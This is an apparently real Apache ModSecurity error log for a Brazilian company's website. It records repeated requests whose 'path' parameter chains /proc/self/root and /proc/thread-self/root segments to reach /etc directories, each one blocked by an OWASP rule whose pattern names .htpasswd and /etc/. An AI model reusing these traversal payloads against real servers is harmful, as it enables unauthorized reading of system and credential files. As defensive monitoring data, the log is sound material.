[Mon Mar 16 19:23:50.927162 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:39908] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiC9o6lpbStxTqkSkuNXwAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:24:18.867397 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:39916] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDErysWC90G-1nBrBqwQAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:24:29.623098 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.243.203:52066] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDHdSswJuvopo3lOiGewAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:24:38.872966 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.243.203:53424] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDJqTCbgAP5jq5TehPpQAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:24:43.590853 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.243.203:41110] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDK6TCbgAP5jq5TehPqQAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:24:47.200110 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:41112] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDL7ABkC4fWIHEf8EeUgAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:25:31.719018 2026] [:error] [pid 29802:tid 140411699963648] [client 74.7.243.203:41124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDW8_BxrYCr4hPDw8RMAAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:25:54.015055 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.241.46:50278] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDcFajLEzk2WiQ-104OQAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:25:58.367649 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.241.46:48312] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDdv9ocpUE4ed4uDwYowAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:26:16.677939 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.241.46:57860] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDiNSswJuvopo3lOiGpwAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:26:22.619787 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.241.46:43852] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDjrysWC90G-1nBrBq2wAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:26:25.011803 2026] [:error] [pid 29802:tid 140411733534464] [client 74.7.241.46:53996] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDkc_BxrYCr4hPDw8ROAAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:26:58.812852 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.241.46:54000] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDsv9ocpUE4ed4uDwY3gAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:27:08.143055 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.241.46:46092] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDvLysWC90G-1nBrBq_AAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:27:14.080875 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.228.16:40870] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiDwtSswJuvopo3lOiGxQAAAI4"]
[Mon Mar 16 19:27:18.903829 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.241.46:40800] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDxs_BxrYCr4hPDw8RVwAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:27:20.189774 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.241.46:39182] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDyM_BxrYCr4hPDw8RWAAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:27:24.675607 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.241.46:39186] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiDzLABkC4fWIHEf8EerQAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:27:32.759301 2026] [:error] [pid 29507:tid 140411540502272] [client 74.7.241.46:39202] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiD1Er9dMAiw-8KANNuMQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:27:35.413806 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.241.46:57324] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiD19SswJuvopo3lOiG1gAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:28:02.165928 2026] [:error] [pid 29802:tid 140411590858496] [client 74.7.241.46:57326] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiD8s_BxrYCr4hPDw8RbQAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:28:21.741223 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.241.46:57118] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEBVajLEzk2WiQ-104dwAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
